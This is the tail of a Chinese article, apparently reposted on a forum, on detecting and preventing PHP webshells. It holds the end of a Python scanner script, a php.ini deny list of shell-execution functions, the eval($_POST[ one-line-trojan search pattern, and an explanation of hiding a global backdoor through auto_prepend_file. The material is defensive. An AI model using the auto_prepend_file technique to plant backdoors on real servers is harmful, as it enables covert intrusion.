<div class="line number77 index76 alt2"><code class="python spaces">    </code><code class="python keyword">if</code> <code class="python plain">os.path.lexists(sys.argv[</code><code class="python value">1</code><code class="python plain">]) </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python color1">False</code><code class="python plain">:</code></div>
<div class="line number78 index77 alt1"><code class="python spaces">        </code><code class="python functions">print</code> <code class="python string">"目录不存在"</code></div>
<div class="line number79 index78 alt2"><code class="python spaces">        </code><code class="python plain">exit()</code></div>
<div class="line number80 index79 alt1"><code class="python spaces">    </code><code class="python functions">print</code> <code class="python plain">(</code><code class="python string">'\n\n开始查找:'</code><code class="python keyword">+</code><code class="python plain">sys.argv[</code><code class="python value">1</code><code class="python plain">])</code></div>
<div class="line number81 index80 alt2"><code class="python spaces">    </code><code class="python keyword">if</code> <code class="python functions">len</code><code class="python plain">(sys.argv) </code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">2</code><code class="python plain">:</code></div>
<div class="line number82 index81 alt1"><code class="python spaces">        </code><code class="python plain">scan(sys.argv[</code><code class="python value">1</code><code class="python plain">])</code></div>
<div class="line number83 index82 alt2"><code class="python spaces">    </code><code class="python keyword">else</code><code class="python plain">:</code></div>
<div class="line number84 index83 alt1"><code class="python spaces">        </code><code class="python plain">exit()</code></div>
</div>
</div>
<h4>2、如何防范</h4>
<h4>php.ini 设置</h4>
<ul>
<li>
<p>disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir</p>
</li>
<li>
<p>设置“safe_mode”为“on”</p>
</li>
<li>
<p>禁止“open_basedir” 可以禁止指定目录之外的文件操作</p>
</li>
<li>
<p>expose_php设为off 这样php不会在http文件头中泄露信息</p>
</li>
<li>
<p>设置“allow_url_fopen”为“off” 可禁止远程文件功能</p>
</li>
<li>
<p>log_errors”设为“on” 错误日志开启</p>
</li>
</ul>
<h4>php编码方面</h4>
<ul>
<li>
<p>所有用户提交的信息  post get 或是其他形式提交的数据都要单独写个过滤函数处理一遍，养成习惯(intval，strip_tags，mysql_real_escape_string)</p>
</li>
<li>
<p>经常检查有没有一句话木马 eval($_POST[ 全站搜索php代码有没有这样的源代码</p>
</li>
<li>
<p>文件要命名规范至少让自己可以一目了然，哪些php文件名字有问题</p>
</li>
<li>
<p>如用开源代码，有补丁出来的话，尽快打上补丁</p>
</li>
<li>
<p>如果攻击者拿到了服务器的最高权限，有可能通过修改服务器的配置文件php.ini来达到他们隐藏后门的目的，前几年比较流行。原理如下：php.ini 里面的这两个配置项：auto_prepend_file ，auto_append_file 可以让php解析前，自己加点东西进去 Automatically add files before or after any PHP document,如果被配置了eval()函数的后门那就很阴险了，php文件代码里面查不出，只会在php解析前包含eval()函数进来并且因为是全局的所以所有php页面都是后门！所以要先确认auto_prepend_file ，auto_append_file没被配置成其他东西，才进行第3点的源代码检查。</p>
</li>
</ul>
<h4>服务器配置</h4>
<p>配置的时候尽量使用最小权限，不要写入或者执行的目录不能给相应的权限</p>
<p>nginx或者apache配置的时候，不能访问的目录一定要配置为deny</p>
<p> </p>
<p> </p>
<p> </p>
<p>文章出处；https://www.cnblogs.com/chenpingzhao/p/6562415.html</p>
<p>参考文章</p>
<p>https://github.com/chenpingzhao/php-webshells</p>
<p>http://blog.csdn.net/miltonzhong/article/details/9714367</p>
<p>http://blog.jobbole.com/53821/</p>

</div>
<div id="MySignature" role="contentinfo">
<div>静有所思，思有所想 </div>
<p>------------------------------------------------------------------------------------</p>
<div>mail: 779783493@qq.com</div><br><br>
来源：https://www.cnblogs.com/-qing-/p/10822442.html

頁: [1]

琼殿技术论坛's Archiver

PHP安全之webshell和后门检测